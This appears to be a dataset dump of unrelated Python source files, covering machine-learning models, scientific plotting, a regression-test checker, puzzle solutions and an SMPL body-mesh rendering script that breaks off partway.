index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
7,600 | 7a6a8b5e344a7b60e369f100885d1e26afa28f46 | from django.apps import AppConfig
class AppValidationsConfig(AppConfig):
name = 'app_validations'
|
7,601 | 3a0bf031b76d2df03cdb5b37861cb8942307709c | import spacy
nlp = spacy.load("en_core_web_lg")
def find_entities(corpus):
doc = nlp(corpus)
entities = {}
for ent in doc.ents:
entity_type = ent.label_
entity_name = ent.text
values = entities.get(entity_type, set())
values.add(entity_name)
entities[entity_type] = values
return {key: list(val) for key, val in entities.items()}
|
7,602 | 74ffbd55867c4b2c6ccbef7d94e0c65aef139057 | import os
import pathlib
from global_settings import *
def get_bits(x):
return np.where(x < 0, 0, 1)
def check_wrong_bits(bits, bits_estimated):
return len(np.argwhere(bits != bits_estimated))
def mkdir(file_path):
folder = os.path.dirname(file_path)
if not os.path.exists(folder):
os.makedirs(folder)
def mkfile(file_path):
mkdir(file_path)
filename = pathlib.Path(file_path)
filename.touch(exist_ok=True)
def concatenate(total, part):
return part if total is None else np.concatenate((total, part))
def complex_channel(m=NUM_ANT, n=NUM_ANT):
real = np.random.randn(m, n)
imag = np.random.randn(m, n)
h = np.row_stack(
(
np.column_stack((real, -imag)),
np.column_stack((imag, real)),
)
)
return h
def make_channel_batch():
h_batch = None
for _ in range(PACKETS_PER_BATCH):
h = complex_channel().reshape([1, 2 * NUM_ANT, 2 * NUM_ANT])
for _ in range(TIME_SLOTS_PER_PACKET):
h_batch = concatenate(h_batch, h)
return h_batch
def signal_batch(batch_size=TIMES_SLOTS_PER_BATCH):
s_batch = None
random_indexes = np.random.uniform(low=0, high=QPSK_CANDIDATE_SIZE, size=batch_size)
for t in range(batch_size):
i = int(random_indexes[t])
s = QPSK_CANDIDATES[:, i:i + 1].reshape([1, 2 * NUM_ANT, 1])
s_batch = concatenate(s_batch, s)
return s_batch
def random_distance(n, length):
x = np.random.uniform(-1, 1, [n, 1, 1]) * length / 2
y = np.random.uniform(-1, 1, [n, 1, 1]) * length / 2
return np.sqrt(x ** 2 + y ** 2)
def zf_batch(y, h):
h_t = np.transpose(h, axes=[0, 2, 1])
f = np.linalg.inv(h_t @ h) @ h_t
z = f @ y
return np.where(z < 0, -1, 1) / np.sqrt(2)
def lmmse_batch(y, h):
assert len(h.shape) == 3
batch_size, m, n = h.shape
eye = np.concatenate([np.eye(n).reshape([1, n, n]) * batch_size], axis=0)
ht = np.transpose(h, axes=[0, 2, 1])
z = np.linalg.inv(ht @ h + eye) @ ht @ y
return np.where(z < 0, -1, 1) / np.sqrt(2)
def maximum_likelihood_detect_bits(y, h):
assert len(h.shape) == 3
batch_size, m, n = h.shape
s_mld = np.zeros([batch_size, n, 1])
if True:
dst = np.sum(np.square(y - h @ QPSK_CANDIDATES), axis=1)
else:
dst = None
for j in range(QPSK_CANDIDATE_SIZE):
s_cand = QPSK_CANDIDATES[:, j:j + 1].reshape([1, 2 * NUM_ANT, 1])
dj = np.sum(np.square(y - h @ s_cand), axis=(1, 2)).reshape([-1, 1])
if dst is None:
dst = dj
else:
dst = np.concatenate((dst, dj), axis=1)
min_indexes = dst.argmin(1)
for i, t in enumerate(min_indexes):
s_mld[i:i + 1, :, :] = QPSK_CANDIDATES[:, t].reshape([1, 2 * NUM_ANT, 1])
return get_bits(s_mld)
|
7,603 | 1c5884c10ac0b6a3335f8e677007fc52311245e2 | # coding=utf-8
"""Advent of Code 2018, Day 7"""
import networkx
import re
G = networkx.DiGraph()
with open("puzzle_input") as f:
for line in f.read().split("\n"):
match = re.search("Step (?P<pre>[A-Z]).*step (?P<post>[A-Z])", line)
G.add_edge(match.group("pre"), match.group("post"))
def part_one():
"""Solution to Part 1"""
return "".join(networkx.lexicographical_topological_sort(G))
def part_two():
"""Solution to Part 2"""
tasks = {}
current_time = 0
while G.nodes():
# noinspection PyCallingNonCallable
candidate_next_tasks = [task for task in G.nodes()
if task not in tasks.keys() and G.in_degree(task) == 0]
if candidate_next_tasks and len(tasks) < 5:
next_task = sorted(candidate_next_tasks)[0]
tasks[next_task] = ord(next_task) - 4
else:
min_task_time = min(tasks.values())
current_time += min_task_time
completed_task = dict(zip(tasks.values(), tasks.keys()))[min_task_time]
tasks = {k: v - min_task_time for k, v in tasks.items() if k != completed_task}
G.remove_node(completed_task)
return current_time
|
7,604 | d4bc6bfe6bef730273db38f3c99352bbc3f48a5f | import os
from celery import Celery
import django
from django.conf import settings
from django.apps import apps
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'nightcrawler.settings')
#celery_app = Celery('nightcrawler.tasks.keep_it', broker=settings.CELERY_BROKER_URL)
celery_app = Celery('nightcrawler', broker=settings.CELERY_BROKER_URL)
celery_app.config_from_object('django.conf:settings')
celery_app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)
#celery_app.autodiscover_tasks()
@celery_app.task(bind=True)
def debug_task(self):
print('Request: {0!r}'.format(self.request))
|
7,605 | e24a62f2a3ff0122922f472a7b37f1773dfe9c11 | import tensorflow as tf
from util.helper import focal_loss
from util.helper import conv_elu_bn
from util.helper import deconv_elu_bn
from util.helper import residual_block_elu
from util.helper import conv_elu
from util.helper import conv
from util.helper import reg_l1_loss
from util.helper import conv_bn
from util.helper import deconv
from util.helper import max_pool2d
from util.helper import upsample_layer
from util.helper import hourglass_module
from util.helper import conv_block
from util.helper import bottlenect_block_v1
from util.helper import pyramid_pooling_block
# 0 cat , 1 dog,
class model_objectdetection_ppm_centernet_v1:
def __init__(self, sess, class_count):
self.sess = sess
self.class_count = class_count
self.up_sample_rate = 1
self.feature_channels = 32
#self.hourglass_channel = 32
with tf.variable_scope('CenterNet'):
self._build_net()
def _build_net(self):
self.learning_rate_tensor = tf.compat.v1.placeholder(tf.float32, shape=[], name='learning_rate')
print(self.learning_rate_tensor)
self.X = tf.compat.v1.placeholder(tf.float32, [None, 512, 512, 3], name='X')
print(self.X)
self.keep_layer = tf.compat.v1.placeholder(tf.bool, name='phase')
print(self.keep_layer)
self.Y = tf.compat.v1.placeholder(tf.float32, [None, 128, 128, self.class_count], 'Y')
self.SIZE = tf.compat.v1.placeholder(tf.float32, [None, 128, 128, 2], 'Y')
print(self.Y)
## Batch , Height , Width, Class
#X_input = tf.compat.v1.reshape(self.X, [-1, 512, 512, 3])
#Y_input = tf.compat.v1.reshape(self.Y, [-1, 128, 128, self.class_count])
# 512 512 -> 256x 256
with tf.variable_scope('downsamples'):
stage_1_1 = conv_block(self.X, conv_type='conv', filters=16, kernel_size=3, strides=2, training=self.keep_layer)
stage_1_2 = conv_block(stage_1_1, conv_type='ds', filters=32, kernel_size=3, strides=2, training=self.keep_layer)
stage_1_3 = conv_block(stage_1_2, conv_type='ds', filters=64, kernel_size=3, strides=2, training=self.keep_layer)
with tf.variable_scope('feature_extraction'):
feature1 = bottlenect_block_v1(inputs=stage_1_3, filters=64, kernel_size=3, upsample_rate=2, strides=2, repeat=2, training=self.keep_layer, name='residual1')
feature2 = bottlenect_block_v1(inputs=feature1, filters=64, kernel_size=3, upsample_rate=2, strides=2, repeat=2, training=self.keep_layer, name='residual2')
feature3 = bottlenect_block_v1(inputs=feature2, filters=32, kernel_size=3, upsample_rate=2, strides=1, repeat=2, training=self.keep_layer, name='residual3')
with tf.variable_scope('pyramid_pooling'):
pyramid = pyramid_pooling_block(feature3, kernel_size=32, input_width=32, input_height=32, bin_sizes=[2, 4, 6, 8])
with tf.variable_scope('featurefuse'):
feature_fuse_layer1 = conv_block(stage_1_3, conv_type='conv', filters=160, kernel_size=1, strides=1, training=self.keep_layer)
print('test',feature_fuse_layer1)
feature_fuse_layer2 = upsample_layer(pyramid, [128, 128])
depthwise_filter = tf.compat.v1.get_variable('feature_fuse_layer2', [3, 3, 32 * 5, 1], initializer=tf.compat.v1.variance_scaling_initializer())
feature_fuse_layer2 = tf.compat.v1.nn.depthwise_conv2d(input=feature_fuse_layer2, filter=depthwise_filter, strides=[1, 1, 1, 1], padding='SAME')
print('feature_deptiwise conv=', feature_fuse_layer2)
feature_fuse_layer2 = tf.compat.v1.layers.batch_normalization(feature_fuse_layer2, scale=True, center=True, momentum=0.9, training=self.keep_layer)
feature_fuse_layer2 = tf.compat.v1.nn.relu(feature_fuse_layer2)
feature_fuse_layer2 = tf.compat.v1.layers.conv2d(inputs=feature_fuse_layer2, filters=1, kernel_size=1, strides=1, padding='same', kernel_initializer=tf.compat.v1.variance_scaling_initializer())
final_feature = feature_fuse_layer2 + feature_fuse_layer1
final_feature = tf.compat.v1.layers.batch_normalization(final_feature, scale=True, center=True, momentum=0.9, training=self.keep_layer)
final_feature = tf.compat.v1.nn.relu(final_feature)
with tf.variable_scope('classifier'):
classifiter = conv_block(final_feature, conv_type='ds', filters=64, kernel_size=3, strides=1, training=self.keep_layer)
#classifiter = conv_block(classifiter, conv_type='ds', filters=64, kernel_size=3, strides=1, training=self.keep_layer)
print("=== network structure ===")
with tf.variable_scope("detector"):
#self.cls = conv_elu_bn(feature_fuse_layer2, filters=self.feature_channels, training=self.keep_layer, kernel_size=3, strides=1, name='detector_convelu1')
self.cls = conv(classifiter, filters=self.class_count, kernel_size=1, strides=1, name='detector_conv1')
self.cls = tf.compat.v1.nn.sigmoid(self.cls, name="heatmap")
#self.size = conv_elu_bn(feature_fuse_layer2, filters=self.feature_channels, training=self.keep_layer, kernel_size=3, strides=1, name='detector_convelu2')
self.size = conv(classifiter, filters=2, kernel_size=1, strides=1, name='detector_conv2')
self.size = tf.compat.v1.nn.relu(self.size, name='sizemap')
print("heatmap sigmoid=", self.cls)
self.output = self.cls;
print("=== network structure ===")
self.heatmap_loss = focal_loss(self.output, self.Y)
self.size_loss = reg_l1_loss(self.size, self.SIZE)
self.cost = self.heatmap_loss + 0.1 * self.size_loss
# define cost/loss & optimizer
update_ops = tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.UPDATE_OPS)
with tf.compat.v1.control_dependencies(update_ops):
self.optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=self.learning_rate_tensor).minimize(self.cost, name='AdamMinimize')
print("==============Node Name List==============")
print("learning rate tensor : ", self.learning_rate_tensor)
print("Input Node Name : ", self.X)
print("Output 4 Train Node Name : ", self.Y)
print("Phase Node Name", self.keep_layer)
print("Output Node Name (heatmap) : ", self.output)
print("Output Node Name (sizemap) : ", self.size)
print("Cost Function Node Name : ", self.cost)
print("Run this operation for a train step :", self.optimizer.name)
print("==============Node Name List==============")
def predict(self, x_test, keep_prop=False):
return self.sess.run([self.output, self.size], feed_dict={self.X: x_test, self.keep_layer: keep_prop})
def get_cost(self, x_test, y_test, y_size, keep_prop=False):
# print(self.sess.run(self.output, feed_dict={self.X: x_test, self.keep_layer: keep_prop}))
return self.sess.run(self.cost, feed_dict={self.X: x_test, self.Y: y_test, self.SIZE:y_size, self.keep_layer: keep_prop})
def train(self, x_data, y_data, y_size, keep_prop=True, learn_rate=0.003):
return self.sess.run(self.optimizer, feed_dict={self.X: x_data, self.Y: y_data, self.SIZE:y_size, self.keep_layer: keep_prop, self.learning_rate_tensor: learn_rate}) |
7,606 | 75754f4032d6e22e53cdbed0f6c640247473faec | import matplotlib.pyplot as plt
import cartopy.crs as ccrs
from cartopy.feature import ShapelyFeature
from shapely.geometry import shape
def plot(s):
proj = ccrs.PlateCarree()
ax = plt.axes(projection=proj)
ax.set_extent((s.bounds[0], s.bounds[2], s.bounds[1], s.bounds[3]), crs=ccrs.PlateCarree())
shape_feature = ShapelyFeature([s], ccrs.PlateCarree(), facecolor='#AAFFAA', edgecolor='k')
ax.add_feature(shape_feature);
gl = ax.gridlines(crs=ccrs.PlateCarree(), draw_labels=True,
linewidth=2, color='gray', alpha=0.5, linestyle='--')
gl.xlabels_top = False
gl.ylabels_left = False
gl.xlabel_style = {'size': 10, 'color': 'black'}
gl.ylabel_style = {'size': 10, 'color': 'black'}
return gl
def plot_merc(s):
proj = ccrs.Mercator()
ax = plt.axes(projection=proj)
ax.set_extent((s.bounds[0], s.bounds[2], s.bounds[1], s.bounds[3]), crs=ccrs.PlateCarree())
shape_feature = ShapelyFeature([s], ccrs.PlateCarree(), facecolor='#AAFFAA', edgecolor='k')
ax.add_feature(shape_feature);
gl = ax.gridlines(crs=ccrs.PlateCarree(), draw_labels=True,
linewidth=2, color='gray', alpha=0.5, linestyle='--')
gl.xlabels_top = False
gl.ylabels_left = False
gl.xlabel_style = {'size': 10, 'color': 'black'}
gl.ylabel_style = {'size': 10, 'color': 'black'}
return gl |
7,607 | cd1987f09ca3e09ac251b1ebdec4168fd5dbdd0e | # 2. Отсортируйте по возрастанию методом слияния одномерный вещественный массив,
# заданный случайными числами на промежутке [0; 50).
# Выведите на экран исходный и отсортированный массивы.
from random import randint
# создаем массив [0, 50) случайных чисел
size = 13
array = [randint(0, 50) for x in range(size)]
print('*' * 30)
print('Initial array:')
print(array)
print('*' * 30)
def merge_sort(merged_arr: list):
"""
функция делит поданный на вход массив,
и рекурсивно все сортирует слиянием
:param merged_arr: - список на входе
:return: - список отсортированный слиянием на выходе
"""
# если массив единичный, то "приехали"
if len(merged_arr) <= 1:
return
# разбиваем начальный массив на левую и правую части
middle = len(merged_arr) // 2
left = merged_arr[:middle]
right = merged_arr[middle:]
# рекуррентно их сортируем
merge_sort(left)
merge_sort(right)
# "сливаем" левую и правые части
comb_arr = merge(left, right)
for i in range(len(merged_arr)):
merged_arr[i] = comb_arr[i]
return merged_arr
def merge(merge_1: list, merge_2: list):
"""
Функция собирает из двух предварительно отсортированных массивов,
поданных на вход, один и ео же возвращает
:param merge_1: - первый отсортированный список
:param merge_2: - второй отсортированный список
:return: - "слитый" из двух, отсортированный список
"""
# заполняем дополнительный массив С нулями
merged_arr = [0] * (len(merge_1) + len(merge_2))
# объявляем и обнуляем счетчики
i = k = n = 0
# разбираем в С из А или В меньший элемент, пока какой-то из А или В не закончится
while i < len(merge_1) and k < len(merge_2):
if merge_1[i] <= merge_2[k]:
merged_arr[n] = merge_1[i]
i += 1
n += 1
else:
merged_arr[n] = merge_2[k]
k += 1
n += 1
# докладываем в С остатки из А или В - где осталось.
while i < len(merge_1):
merged_arr[n] = merge_1[i]
i += 1
n += 1
while k < len(merge_2):
merged_arr[n] = merge_2[k]
k += 1
n += 1
return merged_arr
print('Merge sorted array:')
print(merge_sort(array))
print('*' * 30)
|
7,608 | 517436d61ac9993bee5ecfd932f272dbb8bec60b | class Region:
"""
A region (represented by a list of long/lat coordinates).
"""
def __init__(self, coords, r_votes, d_votes, o_votes):
self.coords = coords
def lats(self):
"Return a list of the latitudes of all the coordinates in the region"
return [y for x,y in self.coords]
def longs(self):
"Return a list of the longitudes of all the coordinates in the region"
return [x for x,y in self.coords]
def min_lat(self):
"Return the minimum latitude of the region"
return min(self.lats())
def min_long(self):
"Return the minimum longitude of the region"
return min(self.longs())
def max_lat(self):
"Return the maximum latitude of the region"
return max(self.lats())
def max_long(self):
"Return the maximum longitude of the region"
return max(self.longs())
|
7,609 | b7521a604fb49591df814d469f53d35574126fdb | import pandas
def ludwig_get_model_definition(df: 'Dataframe', target: str, features: list):
input_features, output_features = [], []
for p in features:
if (pandas.api.types.is_numeric_dtype(df[p])):
input_features.append({'name': p, 'type': 'numerical',
'preprocessing': {'missing_value_strategy': 'fill_with_mean', 'normalization': 'zscore'}})
elif (pandas.api.types.is_string_dtype(df[p])):
input_features.append({'name': p, 'type': 'category'})
else:
raise TypeError(f'column {p} value isnt number or string')
if (pandas.api.types.is_numeric_dtype(df[target])):
output_features.append({'name': target, 'type': 'numerical',
'preprocessing': {'missing_value_strategy': 'fill_with_mean', 'normalization': 'zscore'}})
elif (pandas.api.types.is_string_dtype(df[p])):
output_features.append({'name': target, 'type': 'category'})
else:
raise TypeError(f'column {target} value isnt number or string')
return {
'input_features' : input_features,
'output_features': output_features,
}
|
7,610 | d03669924233edf33fcb6645f5ed7ab118f54a95 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Check mean system norm errors in regression tests
This script determines the pass/fail status of a regression test by comparing
the "Mean System Norm" values output at each timestep against "gold values"
from the reference file provided by the user.
Success is determined by the following criteria: the number of timesteps in the
log file matches the number of timesteps in the gold file, and for each
timestep the system norms meet the absolute and relative tolerances (default
1.0e-16 and 1.0e-7 respectively). The tolerances can be adjusted using command
line arguments, pass `-h` to get a brief usage message.
"""
import sys
import os
import math
import subprocess
import argparse
from shutil import copyfile
def parse_arguments():
"""Parse command line arguments"""
parser = argparse.ArgumentParser(
description="Nalu-Wind regression test check utility")
parser.add_argument(
'--abs-tol', type=float, default=1.0e-15,
help="Tolerance for absolute error")
parser.add_argument(
'--rel-tol', type=float, default=1.0e-7,
help="Tolerance for relative error")
parser.add_argument(
"test_name", help="Regression test name")
parser.add_argument(
"gold_norms", help="Absolute path to the gold norms file")
parser.add_argument(
'--save-norm-file', required=False,
help="File in which to save a copy of the norms")
return parser.parse_args()
def load_norm_file(fname):
"""Parse the norm file and return the mean system norms"""
try:
with open(fname, 'r') as fh:
lines = fh.readlines()
norms = [float(ll.strip().split()[0]) for ll in lines]
return norms
except:
return []
def generate_test_norms(testname):
"""Parse the log file and generate test norms"""
logname = testname + ".log"
norm_name = testname + ".norm"
cmdline = """awk '/Mean System Norm:/ { print $4, $5, $6; }' %s > %s """%(
logname, norm_name)
os.system(cmdline)
args = parse_arguments()
if (args.save_norm_file != None):
copyfile(norm_name, args.save_norm_file)
return load_norm_file(norm_name)
def get_run_time(testname):
"""Return STKPERF total time"""
logname = testname + ".log"
cmdline = """awk '/STKPERF: Total Time/ { print $4; }' %s """%(
logname)
try:
pp = subprocess.run(cmdline, shell=True, check=True, capture_output=True)
return pp.stdout.decode('UTF-8').strip()
except:
return ""
def check_norms(test_norms, gold_norms, atol, rtol):
"""Check the regression test norms"""
if len(test_norms) != len(gold_norms):
print("Number of timesteps do not match", flush=True)
return (False, 1.0e16, 1.0e16)
test_pass = True
abs_diff = 0.0
rel_diff = 0.0
for t1, t2 in zip(test_norms, gold_norms):
adiff = abs(t1 - t2)
rdiff = abs(t1 / t2 - 1.0)
abs_diff = max(abs_diff, adiff)
rel_diff = max(rel_diff, rdiff)
if (adiff > atol) and (rdiff > rtol):
test_pass = False
return (test_pass, abs_diff, rel_diff)
def main():
"""Driver function"""
args = parse_arguments()
test_norms = generate_test_norms(args.test_name)
gold_norms = load_norm_file(args.gold_norms)
run_time = get_run_time(args.test_name)
run_time = float(run_time) if run_time else 0.0
status, adiff, rdiff = check_norms(
test_norms, gold_norms, args.abs_tol, args.rel_tol)
name = args.test_name.ljust(40, ".")
status_str = "PASS:" if status else "FAIL:"
print("%s %-40s %10.4fs %.4e %.4e"%(
status_str, name, run_time, adiff, rdiff), flush=True)
sys.exit(0 if status else 1)
if __name__ == "__main__":
main()
|
7,611 | 2540e2752edaedbf2a011a25cb90f220ae770757 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue May 19 17:27:57 2020
@author: li
"""
import numpy as np
from opendr.renderer import ColoredRenderer
from opendr.lighting import LambertianPointLight
from opendr.camera import ProjectPoints
import cPickle as pkl
from models.smpl import Smpl, copy_smpl, joints_coco
import h5py
from util import im
from render_model import render_model
from util.imutils import crop
import cv2
import matplotlib.pyplot as plt
from os.path import join
import scipy.io as sio
index = 800
#test_path = '../SPIN_MV/data/h36m_train_S1s_3d.npz'
test_path = '../SPIN/data/dataset_extras/h36m_valid_protocol1.npz'
#spin = '../SPIN_MV/S1_single_smplify.npz'
spin = '../SPIN_MV/temp/logs_b16_e20_full_3d_mix/eval_h36m_spin.npz'
#our = '../SPIN_MV/S1_multi_smplify.npz'
our = '../SPIN_MV/temp/logs_b16_e20_full_3d_mix/eval_h36m_our.npz'
mpi_inf_valid = np.load(test_path)
ROOT = '../SPIN_MV/data/'
mpi_inf_spin = np.load(spin)
mpi_inf_pred = np.load(our)
IMG_RES = 224
focal_length = 5000
model_file = 'SMPL_python_v.1.0.0/smpl/models/basicmodel_m_lbs_10_207_0_v1.0.0.pkl'
with open(model_file, 'rb') as fp:
model_data = pkl.load(fp)
fig = plt.figure()
#plt.ion()
#gt_keypoints = np.zeros((400,24,4))
for i in range(70563,70564):
imgname = mpi_inf_valid['imgname'][i]
#print(join(ROOT,imgname))
rgb_img = cv2.imread(join(ROOT,imgname))[:,:,::-1].copy().astype(np.float32)
center = mpi_inf_valid['center'][i]
scale = mpi_inf_valid['scale'][i]
rgb_img = crop(rgb_img, center, scale, [IMG_RES, IMG_RES])
pose = mpi_inf_pred['pose'][i]
betas = mpi_inf_pred['betas'][i]
camera = mpi_inf_pred['camera'][i]
#gt_keypoints[i*batch_size*4+k*4+j] = mpi_inf_valid['S'][i*batch_size+j][k]
camera_t = np.array([camera[1],camera[2], 2*focal_length/(IMG_RES*camera[0] +1e-9)])
w, h = (IMG_RES, IMG_RES)
rn = ColoredRenderer()
pred_base_smpl = Smpl(model_data)
pred_base_smpl.pose[:] = pose
pred_base_smpl.betas[:] = betas
pred_rot = np.eye(3)
rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),
f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)
dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])
verts = pred_base_smpl.r
im = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')
pose_spin = mpi_inf_spin['pose'][i]
betas_spin = mpi_inf_spin['betas'][i]
camera = mpi_inf_spin['camera'][i]
camera_t_spin = np.array([camera[1],camera[2], 2*focal_length/(IMG_RES*camera[0] +1e-9)])
rn = ColoredRenderer()
pred_base_smpl.pose[:] = pose_spin
pred_base_smpl.betas[:] = betas_spin
rn.camera = ProjectPoints(t=camera_t_spin, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),
f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)
dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])
verts = pred_base_smpl.r
im_spin = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')
ort = np.reshape(pose_spin[:3],(3,1))
#print(ort)
ort_mat = cv2.Rodrigues(ort)[0]
#print(ort_mat)
trans_mat = np.array([[-1,0,0],
[0,-1,0],
[0,0,1]])
new_ort = ort_mat.dot(trans_mat)
pred_base_smpl.pose[:3] = cv2.Rodrigues(new_ort)[0].reshape(3)
rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),
f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)
dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])
verts = pred_base_smpl.r
im_1 = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')
fig = plt.figure()
#plt.subplot(1,3,1)
plt.imshow(rgb_img)
height, width, channels = rgb_img.shape
# 如果dpi=300,那么图像大小=height*width
fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
plt.margins(0,0)
plt.axis('off')
plt.savefig("../SPIN_MV/save_h36m/h36m_test_original_%06d.png" % (i), dpi=300)
fig = plt.figure()
#plt.subplot(1,3,2)
plt.imshow(rgb_img)
plt.imshow(im)
# 如果dpi=300,那么图像大小=height*width
fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
plt.margins(0,0)
plt.axis('off')
plt.savefig("../SPIN_MV/save_h36m/h36m_test_our_%06d.png" % (i), dpi=300)
#fig = plt.figure()
#plt.subplot()
#plt.imshow(im_1)
# 如果dpi=300,那么图像大小=height*width
# fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
# plt.gca().xaxis.set_major_locator(plt.NullLocator())
# plt.gca().yaxis.set_major_locator(plt.NullLocator())
#plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
#plt.margins(0,0)
#plt.axis('off')
#plt.savefig("../SPIN_MV/save_mpi_smpl/mpi_test_our_view_%04d.png" % (i), dpi=300)
fig = plt.figure()
#plt.subplot(1,3,3)
plt.imshow(rgb_img)
plt.imshow(im_spin)
fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
plt.margins(0,0)
plt.axis('off')
plt.savefig("../SPIN_MV/save_h36m/h36m_test_spin_%06d.png" % (i), dpi=300)
#plt.savefig('../SPIN_MV/save_h36m/h36m_test_%06d.png' % i)
#plt.pause(1e-3)
"""
iter_num = 25
batch_size = 4
for i in range(24,25): # iteration number
for j in range(2,3): #batch_size
for k in range(1,2):
imgname = mpi_inf_valid['imgname'][i*batch_size+j][k]
#print(join(ROOT,imgname))
rgb_img = cv2.imread(join(ROOT,imgname))[:,:,::-1].copy().astype(np.float32)
center = mpi_inf_valid['center'][i*batch_size+j][k]
scale = mpi_inf_valid['scale'][i*batch_size+j][k]
rgb_img = crop(rgb_img, center, scale, [IMG_RES, IMG_RES])
pose = mpi_inf_pred['pose'][i*batch_size*4+k*4+j]
betas = mpi_inf_pred['betas'][i*batch_size*4+k*4+j]
camera_t = mpi_inf_pred['camera'][i*batch_size*4+k*4+j]
#gt_keypoints[i*batch_size*4+k*4+j] = mpi_inf_valid['S'][i*batch_size+j][k]
#camera_t = np.array([camera[1],camera[2], 2*focal_length/(IMG_RES*camera[0] +1e-9)])
w, h = (IMG_RES, IMG_RES)
rn = ColoredRenderer()
pred_base_smpl = Smpl(model_data)
pred_base_smpl.pose[:] = pose
pred_base_smpl.betas[:] = betas
pred_rot = np.eye(3)
rn.camera = ProjectPoints(t=camera_t, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),
f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)
dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])
verts = pred_base_smpl.r
im = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')
pose_spin = mpi_inf_spin['pose'][i*batch_size*4+k*4+j]
betas_spin = mpi_inf_spin['betas'][i*batch_size*4+k*4+j]
camera_t_spin = mpi_inf_spin['camera'][i*batch_size*4+k*4+j]
#camera_t_spin = np.array([camera[1],camera[2], 2*focal_length/(IMG_RES*camera[0] +1e-9)])
rn = ColoredRenderer()
pred_base_smpl.pose[:] = pose_spin
pred_base_smpl.betas[:] = betas_spin
rn.camera = ProjectPoints(t=camera_t_spin, rt=cv2.Rodrigues(pred_rot)[0].reshape(3), c=np.array([112, 112]),
f=np.array([5000,5000]), k=np.zeros(5), v=pred_base_smpl)
dist = np.abs(rn.camera.t.r[2] - np.mean(pred_base_smpl.r, axis=0)[2])
verts = pred_base_smpl.r
im_spin = (render_model(verts, pred_base_smpl.f, w, h, rn.camera, far=20+dist) * 255.).astype('uint8')
# orignal image
fig = plt.figure()
#plt.imshow(im+)
#plt.subplot(1,3,1)
plt.imshow(rgb_img)
plt.axis('off')
#plt.subplot(1,3,2)
height, width, channels = rgb_img.shape
# 如果dpi=300,那么图像大小=height*width
fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
plt.margins(0,0)
plt.savefig("../SPIN_MV/save_smpl/S1_%d_view_%d_orig.png" % (i*batch_size+j, k), dpi=300)
# multi
fig = plt.figure()
plt.imshow(rgb_img)
plt.imshow(im)
plt.axis('off')
height, width, channels = rgb_img.shape
# 如果dpi=300,那么图像大小=height*width
fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
plt.margins(0,0)
plt.savefig("../SPIN_MV/save_smpl/S1_%d_view_%d_multi.png" % (i*batch_size+j, k), dpi=300)
#plt.imshow(img[sample_idx].transpose((1,2,0)))
#plt.subplot(1,2,1)
# single
fig = plt.figure()
#plt.subplot(1,3,3)
plt.imshow(rgb_img)
#plt.imshow(img[sample_idx].transpose((1,2,0)))
#plt.subplot(1,2,1)
plt.imshow(im_spin)
plt.axis('off')
#plt.ioff()
fig.set_size_inches(width/100.0/3.0, height/100.0/3.0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)
plt.margins(0,0)
plt.savefig("../SPIN_MV/save_smpl/S1_%d_view_%d_single.png" % (i*batch_size+j, k), dpi=300)
#plt.pause(1e-3)
#plt.show()
"""
"""
H36M_TO_J17 = [6, 5, 4, 1, 2, 3, 16, 15, 14, 11, 12, 13, 8, 10, 0, 7, 9]
H36M_TO_J14 = H36M_TO_J17[:14]
J24_TO_J17 = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 18, 14, 16, 17]
